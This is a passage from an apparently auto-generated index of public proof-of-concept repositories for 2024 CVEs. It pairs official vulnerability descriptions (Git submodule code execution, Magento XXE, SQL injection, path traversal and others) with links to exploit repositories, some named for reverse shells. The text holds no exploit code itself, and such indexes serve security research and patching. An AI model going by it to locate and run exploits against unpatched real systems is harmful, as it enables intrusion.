- [k3lpi3b4nsh33/CVE-2024-31982](https://github.com/k3lpi3b4nsh33/CVE-2024-31982)
- [th3gokul/CVE-2024-31982](https://github.com/th3gokul/CVE-2024-31982)
- [bigb0x/CVE-2024-31982](https://github.com/bigb0x/CVE-2024-31982)
### CVE-2024-31989 (2024-05-21)
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It has been discovered that an unprivileged pod in a different namespace on the same cluster could connect to the Redis server on port 6379. Despite having installed the latest version of the VPC CNI plugin on the EKS cluster, it requires manual enablement through configuration to enforce network policies. This raises concerns that many clients might unknowingly have open access to their Redis servers. This vulnerability could lead to Privilege Escalation to the level of cluster controller, or to information leakage, affecting anyone who does not have strict access controls on their Redis instance. This issue has been patched in version(s) 2.8.19, 2.9.15 and 2.10.10.
- [vt0x78/CVE-2024-31989](https://github.com/vt0x78/CVE-2024-31989)
### CVE-2024-32002 (2024-05-14)
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
- [markuta/CVE-2024-32002](https://github.com/markuta/CVE-2024-32002)
- [markuta/hooky](https://github.com/markuta/hooky)
- [amalmurali47/git_rce](https://github.com/amalmurali47/git_rce)
- [amalmurali47/hook](https://github.com/amalmurali47/hook)
- [M507/CVE-2024-32002](https://github.com/M507/CVE-2024-32002)
- [JakobTheDev/cve-2024-32002-submodule-rce](https://github.com/JakobTheDev/cve-2024-32002-submodule-rce)
- [JakobTheDev/cve-2024-32002-poc-rce](https://github.com/JakobTheDev/cve-2024-32002-poc-rce)
- [safebuffer/CVE-2024-32002](https://github.com/safebuffer/CVE-2024-32002)
- [10cks/CVE-2024-32002-POC](https://github.com/10cks/CVE-2024-32002-POC)
- [10cks/CVE-2024-32002-hulk](https://github.com/10cks/CVE-2024-32002-hulk)
- [10cks/CVE-2024-32002-submod](https://github.com/10cks/CVE-2024-32002-submod)
- [10cks/CVE-2024-32002-smash](https://github.com/10cks/CVE-2024-32002-smash)
- [10cks/CVE-2024-32002-linux-hulk](https://github.com/10cks/CVE-2024-32002-linux-hulk)
- [10cks/CVE-2024-32002-linux-submod](https://github.com/10cks/CVE-2024-32002-linux-submod)
- [10cks/CVE-2024-32002-linux-smash](https://github.com/10cks/CVE-2024-32002-linux-smash)
- [aitorcastel/poc_CVE-2024-32002](https://github.com/aitorcastel/poc_CVE-2024-32002)
- [aitorcastel/poc_CVE-2024-32002_submodule](https://github.com/aitorcastel/poc_CVE-2024-32002_submodule)
- [10cks/hook](https://github.com/10cks/hook)
- [jweny/CVE-2024-32002_HOOK](https://github.com/jweny/CVE-2024-32002_HOOK)
- [jweny/CVE-2024-32002_EXP](https://github.com/jweny/CVE-2024-32002_EXP)
- [CrackerCat/CVE-2024-32002_EXP](https://github.com/CrackerCat/CVE-2024-32002_EXP)
- [Roronoawjd/hook](https://github.com/Roronoawjd/hook)
- [Roronoawjd/git_rce](https://github.com/Roronoawjd/git_rce)
- [JJoosh/CVE-2024-32002-Reverse-Shell](https://github.com/JJoosh/CVE-2024-32002-Reverse-Shell)
- [1mxml/CVE-2024-32002-poc](https://github.com/1mxml/CVE-2024-32002-poc)
- [bfengj/CVE-2024-32002-hook](https://github.com/bfengj/CVE-2024-32002-hook)
- [ycdxsb/CVE-2024-32002-hulk](https://github.com/ycdxsb/CVE-2024-32002-hulk)
- [ycdxsb/CVE-2024-32002-submod](https://github.com/ycdxsb/CVE-2024-32002-submod)
- [bfengj/CVE-2024-32002-Exploit](https://github.com/bfengj/CVE-2024-32002-Exploit)
- [vincepsh/CVE-2024-32002](https://github.com/vincepsh/CVE-2024-32002)
- [vincepsh/CVE-2024-32002-hook](https://github.com/vincepsh/CVE-2024-32002-hook)
- [JJoosh/CVE-2024-32002](https://github.com/JJoosh/CVE-2024-32002)
- [10cks/CVE-2024-32002-EXP](https://github.com/10cks/CVE-2024-32002-EXP)
- [WOOOOONG/CVE-2024-32002](https://github.com/WOOOOONG/CVE-2024-32002)
- [WOOOOONG/hook](https://github.com/WOOOOONG/hook)
- [fadhilthomas/poc-cve-2024-32002](https://github.com/fadhilthomas/poc-cve-2024-32002)
- [fadhilthomas/hook](https://github.com/fadhilthomas/hook)
- [JakobTheDev/cve-2024-32002-submodule-aw](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw)
- [JakobTheDev/cve-2024-32002-poc-aw](https://github.com/JakobTheDev/cve-2024-32002-poc-aw)
- [Goplush/CVE-2024-32002-git-rce](https://github.com/Goplush/CVE-2024-32002-git-rce)
- [431m/rcetest](https://github.com/431m/rcetest)
- [AD-Appledog/CVE-2024-32002](https://github.com/AD-Appledog/CVE-2024-32002)
- [AD-Appledog/wakuwaku](https://github.com/AD-Appledog/wakuwaku)
- [tobelight/cve_2024_32002](https://github.com/tobelight/cve_2024_32002)
- [Basyaact/CVE-2024-32002-PoC_Chinese](https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese)
- [EQSTLab/git_rce](https://github.com/EQSTLab/git_rce)
- [sysonlai/CVE-2024-32002-hook](https://github.com/sysonlai/CVE-2024-32002-hook)
- [TSY244/CVE-2024-32002-git-rce-father-poc](https://github.com/TSY244/CVE-2024-32002-git-rce-father-poc)
- [TSY244/CVE-2024-32002-git-rce](https://github.com/TSY244/CVE-2024-32002-git-rce)
- [blackninja23/CVE-2024-32002](https://github.com/blackninja23/CVE-2024-32002)
- [daemon-reconfig/CVE-2024-32002](https://github.com/daemon-reconfig/CVE-2024-32002)
- [charlesgargasson/CVE-2024-32002](https://github.com/charlesgargasson/CVE-2024-32002)
- [NishanthAnand21/CVE-2024-32002-PoC](https://github.com/NishanthAnand21/CVE-2024-32002-PoC)
- [FlojBoj/CVE-2024-32002](https://github.com/FlojBoj/CVE-2024-32002)
- [tiyeume25112004/CVE-2024-32002](https://github.com/tiyeume25112004/CVE-2024-32002)
- [chrisWalker11/running-CVE-2024-32002-locally-for-tesing](https://github.com/chrisWalker11/running-CVE-2024-32002-locally-for-tesing)
- [sanan2004/CVE-2024-32002](https://github.com/sanan2004/CVE-2024-32002)
- [Masamuneee/hook](https://github.com/Masamuneee/hook)
- [Masamuneee/CVE-2024-32002-POC](https://github.com/Masamuneee/CVE-2024-32002-POC)
- [th4s1s/CVE-2024-32002-PoC](https://github.com/th4s1s/CVE-2024-32002-PoC)
- [Julian-gmz/hook_CVE-2024-32002](https://github.com/Julian-gmz/hook_CVE-2024-32002)
- [grecosamuel/CVE-2024-32002](https://github.com/grecosamuel/CVE-2024-32002)
### CVE-2024-32004 (2024-05-14)
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.
- [Wadewfsssss/CVE-2024-32004](https://github.com/Wadewfsssss/CVE-2024-32004)
- [10cks/CVE-2024-32004-POC](https://github.com/10cks/CVE-2024-32004-POC)
### CVE-2024-32030 (2024-06-19)
Kafka UI is an Open-Source Web UI for Apache Kafka Management. Kafka UI API allows users to connect to different Kafka brokers by specifying their network address and port. As a separate feature, it also provides the ability to monitor the performance of Kafka brokers by connecting to their JMX ports. JMX is based on the RMI protocol, so it is inherently susceptible to deserialization attacks. A potential attacker can exploit this feature by connecting Kafka UI backend to its own malicious broker. This vulnerability affects the deployments where one of the following occurs: 1. dynamic.config.enabled property is set in settings. It's not enabled by default, but it's suggested to be enabled in many tutorials for Kafka UI, including its own README.md. OR 2. an attacker has access to the Kafka cluster that is being connected to Kafka UI. In this scenario the attacker can exploit this vulnerability to expand their access and execute code on Kafka UI as well. Instead of setting up a legitimate JMX port, an attacker can create an RMI listener that returns a malicious serialized object for any RMI call. In the worst case it could lead to remote code execution as Kafka UI has the required gadget chains in its classpath. This issue may lead to post-auth remote code execution. This is particularly dangerous as Kafka-UI does not have authentication enabled by default. This issue has been addressed in version 0.7.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. These issues were discovered and reported by the GitHub Security lab and is also tracked as GHSL-2023-230.
- [huseyinstif/CVE-2024-32030-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template)
### CVE-2024-32104 (2024-04-15)
Cross-Site Request Forgery (CSRF) vulnerability in XLPlugins NextMove Lite.This issue affects NextMove Lite: from n/a through 2.18.1.\n\n
- [Cerberus-HiproPlus/CVE-2024-32104](https://github.com/Cerberus-HiproPlus/CVE-2024-32104)
### CVE-2024-32113 (2024-05-08)
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.\n\nUsers are recommended to upgrade to version 18.12.13, which fixes the issue.\n\n
- [RacerZ-fighting/CVE-2024-32113-POC](https://github.com/RacerZ-fighting/CVE-2024-32113-POC)
- [Mr-xn/CVE-2024-32113](https://github.com/Mr-xn/CVE-2024-32113)
- [YongYe-Security/CVE-2024-32113](https://github.com/YongYe-Security/CVE-2024-32113)
### CVE-2024-32136 (2024-04-15)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xenioushk BWL Advanced FAQ Manager.This issue affects BWL Advanced FAQ Manager: from n/a through 2.0.3.\n\n
- [xbz0n/CVE-2024-32136](https://github.com/xbz0n/CVE-2024-32136)
### CVE-2024-32205
- [Lucky-lm/CVE-2024-32205](https://github.com/Lucky-lm/CVE-2024-32205)
### CVE-2024-32238 (2024-04-22)
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
- [asdfjkl11/CVE-2024-32238](https://github.com/asdfjkl11/CVE-2024-32238)
- [FuBoLuSec/CVE-2024-32238](https://github.com/FuBoLuSec/CVE-2024-32238)
### CVE-2024-32258 (2024-04-23)
The network server of fceux 2.7.0 has a path traversal vulnerability, allowing attackers to overwrite any files on the server without authentication by fake ROM.
- [liyansong2018/CVE-2024-32258](https://github.com/liyansong2018/CVE-2024-32258)
### CVE-2024-32369 (2024-05-07)
SQL Injection vulnerability in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameter in the mliWhiteList.php component.
- [chucrutis/CVE-2024-32369](https://github.com/chucrutis/CVE-2024-32369)
### CVE-2024-32370 (2024-05-07)
An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.
- [chucrutis/CVE-2024-32370](https://github.com/chucrutis/CVE-2024-32370)
### CVE-2024-32371 (2024-05-07)
An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a regular user account to escalate their privileges and gain administrative access by changing the type parameter from 1 to 0.
- [chucrutis/CVE-2024-32371](https://github.com/chucrutis/CVE-2024-32371)
### CVE-2024-32399 (2024-04-22)
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
- [NN0b0dy/CVE-2024-32399](https://github.com/NN0b0dy/CVE-2024-32399)
### CVE-2024-32459 (2024-04-22)
FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients and servers that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. No known workarounds are available.
- [absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-](https://github.com/absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-)
### CVE-2024-32523 (2024-05-17)
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in EverPress Mailster allows PHP Local File Inclusion.This issue affects Mailster: from n/a through 4.0.6.
- [truonghuuphuc/CVE-2024-32523-Poc](https://github.com/truonghuuphuc/CVE-2024-32523-Poc)
### CVE-2024-32640
- [Stuub/CVE-2024-32640-SQLI-MuraCMS](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS)
- [0xYumeko/CVE-2024-32640-SQLI-MuraCMS](https://github.com/0xYumeko/CVE-2024-32640-SQLI-MuraCMS)
- [sammings/CVE-2024-32640](https://github.com/sammings/CVE-2024-32640)
### CVE-2024-32651 (2024-04-25)
changedetection.io is an open source web page change detection, website watcher, restock monitor and notification service. There is a Server Side Template Injection (SSTI) in Jinja2 that allows Remote Command Execution on the server host. Attackers can run any system command without any restriction and they could use a reverse shell. The impact is critical as the attacker can completely takeover the server machine. This can be reduced if changedetection is behind a login page, but this isn't required by the application (not by default and not enforced).
- [zcrosman/cve-2024-32651](https://github.com/zcrosman/cve-2024-32651)
- [s0ck3t-s3c/CVE-2024-32651-changedetection-RCE](https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE)
### CVE-2024-32700 (2024-05-13)
Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress.This issue affects Kognetiks Chatbot for WordPress: from n/a through 2.0.0.
- [nastar-id/CVE-2024-32700](https://github.com/nastar-id/CVE-2024-32700)
### CVE-2024-32709 (2024-04-24)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.5.\n\n
- [truonghuuphuc/CVE-2024-32709-Poc](https://github.com/truonghuuphuc/CVE-2024-32709-Poc)
### CVE-2024-33111 (2024-05-06)
D-Link DIR-845L router <=v1.01KRb03 is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
- [FaLLenSKiLL1/CVE-2024-33111](https://github.com/FaLLenSKiLL1/CVE-2024-33111)
### CVE-2024-33113 (2024-05-06)
D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.
- [FaLLenSKiLL1/CVE-2024-33113](https://github.com/FaLLenSKiLL1/CVE-2024-33113)
- [tekua/CVE-2024-33113](https://github.com/tekua/CVE-2024-33113)
### CVE-2024-33209
- [paragbagul111/CVE-2024-33209](https://github.com/paragbagul111/CVE-2024-33209)
### CVE-2024-33210
- [paragbagul111/CVE-2024-33210](https://github.com/paragbagul111/CVE-2024-33210)
### CVE-2024-33231
- [fdzdev/CVE-2024-33231](https://github.com/fdzdev/CVE-2024-33231)
### CVE-2024-33352
- [mmiszczyk/CVE-2024-33352](https://github.com/mmiszczyk/CVE-2024-33352)
### CVE-2024-33438 (2024-04-29)
File Upload vulnerability in CubeCart before 6.5.5 allows an authenticated user to execute arbitrary code via a crafted .phar file.
- [julio-cfa/CVE-2024-33438](https://github.com/julio-cfa/CVE-2024-33438)
### CVE-2024-33453
- [Ant1sec-ops/CVE-2024-33453](https://github.com/Ant1sec-ops/CVE-2024-33453)
### CVE-2024-33559 (2024-04-29)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection.This issue affects XStore: from n/a through 9.3.5.\n\n
- [absholi7ly/WordPress-XStore-theme-SQL-Injection](https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection)
### CVE-2024-33644 (2024-05-17)
Improper Control of Generation of Code ('Code Injection') vulnerability in WPCustomify Customify Site Library allows Code Injection.This issue affects Customify Site Library: from n/a through 0.0.9.
- [Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally](https://github.com/Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally)
### CVE-2024-33722
- [fuzzlove/soplanning-1.52-exploits](https://github.com/fuzzlove/soplanning-1.52-exploits)
### CVE-2024-33775 (2024-05-01)
An issue with the Autodiscover component in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted Dashlet.
- [Neo-XeD/CVE-2024-33775](https://github.com/Neo-XeD/CVE-2024-33775)
### CVE-2024-33883 (2024-04-28)
The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.
- [Grantzile/PoC-CVE-2024-33883](https://github.com/Grantzile/PoC-CVE-2024-33883)
### CVE-2024-33911 (2024-05-02)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar School Management Pro.This issue affects School Management Pro: from n/a through 10.3.4.\n\n
- [xbz0n/CVE-2024-33911](https://github.com/xbz0n/CVE-2024-33911)
### CVE-2024-34102 (2024-06-13)
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
- [ArturArz1/TestCVE-2024-34102](https://github.com/ArturArz1/TestCVE-2024-34102)
- [th3gokul/CVE-2024-34102](https://github.com/th3gokul/CVE-2024-34102)
- [bigb0x/CVE-2024-34102](https://github.com/bigb0x/CVE-2024-34102)
- [11whoami99/CVE-2024-34102](https://github.com/11whoami99/CVE-2024-34102)
- [d0rb/CVE-2024-34102](https://github.com/d0rb/CVE-2024-34102)
- [Chocapikk/CVE-2024-34102](https://github.com/Chocapikk/CVE-2024-34102)
- [0x0d3ad/CVE-2024-34102](https://github.com/0x0d3ad/CVE-2024-34102)
- [cmsec423/CVE-2024-34102](https://github.com/cmsec423/CVE-2024-34102)
- [cmsec423/Magento-XXE-CVE-2024-34102](https://github.com/cmsec423/Magento-XXE-CVE-2024-34102)
- [jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento](https://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento)
- [SamJUK/cosmicsting-validator](https://github.com/SamJUK/cosmicsting-validator)
- [unknownzerobit/poc](https://github.com/unknownzerobit/poc)
- [crynomore/CVE-2024-34102](https://github.com/crynomore/CVE-2024-34102)
- [bughuntar/CVE-2024-34102](https://github.com/bughuntar/CVE-2024-34102)
- [bughuntar/CVE-2024-34102-Python](https://github.com/bughuntar/CVE-2024-34102-Python)
- [Phantom-IN/CVE-2024-34102](https://github.com/Phantom-IN/CVE-2024-34102)
- [wubinworks/magento2-cosmic-sting-patch](https://github.com/wubinworks/magento2-cosmic-sting-patch)
- [EQSTLab/CVE-2024-34102](https://github.com/EQSTLab/CVE-2024-34102)
- [dream434/CVE-2024-34102](https://github.com/dream434/CVE-2024-34102)
- [bka/magento-cve-2024-34102-exploit-cosmicstring](https://github.com/bka/magento-cve-2024-34102-exploit-cosmicstring)
### CVE-2024-34144 (2024-05-02)
A sandbox bypass vulnerability involving crafted constructor bodies in Jenkins Script Security Plugin 1335.vf07d9ce377a_e and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.
- [MXWXZ/CVE-2024-34144](https://github.com/MXWXZ/CVE-2024-34144)
### CVE-2024-34220 (-)
Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the 'leave' parameter.
- [dovankha/CVE-2024-34220](https://github.com/dovankha/CVE-2024-34220)
### CVE-2024-34221 (-)
Sourcecodester Human Resource Management System 1.0 is vulnerable to Insecure Permissions resulting in privilege escalation.
- [dovankha/CVE-2024-34221](https://github.com/dovankha/CVE-2024-34221)
### CVE-2024-34222 (-)
Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the searccountry parameter.
- [dovankha/CVE-2024-34222](https://github.com/dovankha/CVE-2024-34222)
### CVE-2024-34223 (-)
Insecure permission vulnerability in /hrm/leaverequest.php in SourceCodester Human Resource Management System 1.0 allow attackers to approve or reject leave ticket.
- [dovankha/CVE-2024-34223](https://github.com/dovankha/CVE-2024-34223)
### CVE-2024-34224 (-)
Cross Site Scripting vulnerability in /php-lms/classes/Users.php?f=save in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the firstname, middlename, lastname parameters.
- [dovankha/CVE-2024-34224](https://github.com/dovankha/CVE-2024-34224)
### CVE-2024-34225 (-)
Cross Site Scripting vulnerability in php-lms/admin/?page=system_info in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the name, shortname parameters.
- [dovankha/CVE-2024-34225](https://github.com/dovankha/CVE-2024-34225)
### CVE-2024-34226 (-)
SQL injection vulnerability in /php-sqlite-vms/?page=manage_visitor&id=1 in SourceCodester Visitor Management System 1.0 allow attackers to execute arbitrary SQL commands via the id parameters.
- [dovankha/CVE-2024-34226](https://github.com/dovankha/CVE-2024-34226)
### CVE-2024-34310 (-)
Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.
- [3309899621/CVE-2024-34310](https://github.com/3309899621/CVE-2024-34310)
### CVE-2024-34312 (2024-06-24)
Virtual Programming Lab for Moodle up to v4.2.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the component vplide.js.
- [vincentscode/CVE-2024-34312](https://github.com/vincentscode/CVE-2024-34312)
### CVE-2024-34313 (2024-06-24)
An issue in VPL Jail System up to v4.0.2 allows attackers to execute a directory traversal via a crafted request to a public endpoint.
- [vincentscode/CVE-2024-34313](https://github.com/vincentscode/CVE-2024-34313)
### CVE-2024-34329 (2024-07-22)
Insecure permissions in Entrust Datacard XPS Card Printer Driver 8.4 and earlier allows unauthenticated attackers to execute arbitrary code as SYSTEM via a crafted DLL payload.
- [pamoutaf/CVE-2024-34329](https://github.com/pamoutaf/CVE-2024-34329)
### CVE-2024-34350 (2024-05-09)
Next.js is a React framework that can provide building blocks to create web applications. Prior to 13.5.1, an inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites) feature in Next.js. The vulnerability is resolved in Next.js `13.5.1` and newer.
- [Sudistark/rewrites-nextjs-CVE-2024-34350](https://github.com/Sudistark/rewrites-nextjs-CVE-2024-34350)
### CVE-2024-34351 (2024-05-09)
Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`.
- [Voorivex/CVE-2024-34351](https://github.com/Voorivex/CVE-2024-34351)
- [God4n/nextjs-CVE-2024-34351-_exploit](https://github.com/God4n/nextjs-CVE-2024-34351-_exploit)
### CVE-2024-34361 (2024-07-05)
Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. A vulnerability in versions prior to 5.18.3 allows an authenticated user to make internal requests to the server via the `gravity_DownloadBlocklistFromUrl()` function. Depending on some circumstances, the vulnerability could lead to remote command execution. Version 5.18.3 contains a patch for this issue.
- [T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE](https://github.com/T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE)
### CVE-2024-34452 (2024-06-21)
CMSimple_XH 1.7.6 allows XSS by uploading a crafted SVG document.
- [surajhacx/CVE-2024-34452](https://github.com/surajhacx/CVE-2024-34452)
### CVE-2024-34463 (2024-09-03)
BPL Personal Weighing Scale PWS-01BT IND/09/18/599 devices send sensitive information in unencrypted BLE packets. (The packet data also lacks authentication and integrity protection.)
- [yash-chandna/CVE-2024-34463](https://github.com/yash-chandna/CVE-2024-34463)
### CVE-2024-34469 (2024-05-04)
Rukovoditel before 3.5.3 allows XSS via user_photo to index.php?module=users/registration&action=save.
- [Toxich4/CVE-2024-34469](https://github.com/Toxich4/CVE-2024-34469)
### CVE-2024-34470 (2024-05-06)
An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
- [osvaldotenorio/CVE-2024-34470](https://github.com/osvaldotenorio/CVE-2024-34470)
- [bigb0x/CVE-2024-34470](https://github.com/bigb0x/CVE-2024-34470)
- [Cappricio-Securities/CVE-2024-34470](https://github.com/Cappricio-Securities/CVE-2024-34470)
- [Mr-r00t11/CVE-2024-34470](https://github.com/Mr-r00t11/CVE-2024-34470)
- [th3gokul/CVE-2024-34470](https://github.com/th3gokul/CVE-2024-34470)
### CVE-2024-34471 (2024-05-06)
An issue was discovered in HSC Mailinspector 5.2.17-3. A Path Traversal vulnerability (resulting in file deletion) exists in the mliRealtimeEmails.php file. The filename parameter in the export HTML functionality does not properly validate the file location, allowing an attacker to read and delete arbitrary files on the server. This was observed when the mliRealtimeEmails.php file itself was read and subsequently deleted, resulting in a 404 error for the file and disruption of email information loading.
- [osvaldotenorio/CVE-2024-34471](https://github.com/osvaldotenorio/CVE-2024-34471)
### CVE-2024-34472 (2024-05-06)
An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An authenticated blind SQL injection vulnerability exists in the mliRealtimeEmails.php file. The ordemGrid parameter in a POST request to /mailinspector/mliRealtimeEmails.php does not properly sanitize input, allowing an authenticated attacker to execute arbitrary SQL commands, leading to the potential disclosure of the entire application database.
- [osvaldotenorio/CVE-2024-34472](https://github.com/osvaldotenorio/CVE-2024-34472)
### CVE-2024-34474 (2024-05-05)
Clario through 2024-04-11 for Desktop has weak permissions for %PROGRAMDATA%\Clario and tries to load DLLs from there as SYSTEM.
- [Alaatk/CVE-2024-34474](https://github.com/Alaatk/CVE-2024-34474)
### CVE-2024-34582 (-)
Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature.
- [silent6trinity/CVE-2024-34582](https://github.com/silent6trinity/CVE-2024-34582)
### CVE-2024-34693 (2024-06-20)
Improper Input Validation vulnerability in Apache Superset, allows for an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow for local infile, it's possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content on a MariaDB database table.This issue affects Apache Superset: before 3.1.3 and version 4.0.0\n\nUsers are recommended to upgrade to version 4.0.1 or 3.1.3, which fixes the issue.\n\n
- [mbadanoiu/CVE-2024-34693](https://github.com/mbadanoiu/CVE-2024-34693)
- [Mr-r00t11/CVE-2024-34693](https://github.com/Mr-r00t11/CVE-2024-34693)
### CVE-2024-34716 (2024-05-14)
PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled through the front-office contact form, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator's right. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature-flag.
- [aelmokhtar/CVE-2024-34716](https://github.com/aelmokhtar/CVE-2024-34716)
- [TanveerS1ngh/Prestashop-CVE-2024-34716](https://github.com/TanveerS1ngh/Prestashop-CVE-2024-34716)
### CVE-2024-34739 (2024-08-15)
In shouldRestrictOverlayActivities of UsbProfileGroupSettingsManager.java, there is a possible escape from SUW due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.
- [uthrasri/CVE-2024-34739](https://github.com/uthrasri/CVE-2024-34739)
### CVE-2024-34741 (2024-08-15)
In setForceHideNonSystemOverlayWindowIfNeeded of WindowState.java, there is a possible way for message content to be visible on the screensaver while lock screen visibility settings are restricted by the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [uthrasri/CVE-2024-34741](https://github.com/uthrasri/CVE-2024-34741)
### CVE-2024-34831 (2024-09-10)
cross-site scripting (XSS) vulnerability in Gibbon Core v26.0.00 allows an attacker to execute arbitrary code via the imageLink parameter in the library_manage_catalog_editProcess.php component.
- [enzored/CVE-2024-34831](https://github.com/enzored/CVE-2024-34831)
### CVE-2024-34832 (-)
Directory Traversal vulnerability in CubeCart v.6.5.5 and before allows an attacker to execute arbitrary code via a crafted file uploaded to the _g and node parameters.
- [julio-cfa/CVE-2024-34832](https://github.com/julio-cfa/CVE-2024-34832)
### CVE-2024-34833 (2024-06-17)
Sourcecodester Payroll Management System v1.0 is vulnerable to File Upload. Users can upload images via the "save_settings" page. An unauthenticated attacker can leverage this functionality to upload a malicious PHP file instead. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as the user running the web server.
- [ShellUnease/CVE-2024-34833-payroll-management-system-rce](https://github.com/ShellUnease/CVE-2024-34833-payroll-management-system-rce)
### CVE-2024-34958 (-)
idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add
- [Gr-1m/CVE-2024-34958](https://github.com/Gr-1m/CVE-2024-34958)
### CVE-2024-35133 (2024-08-29)
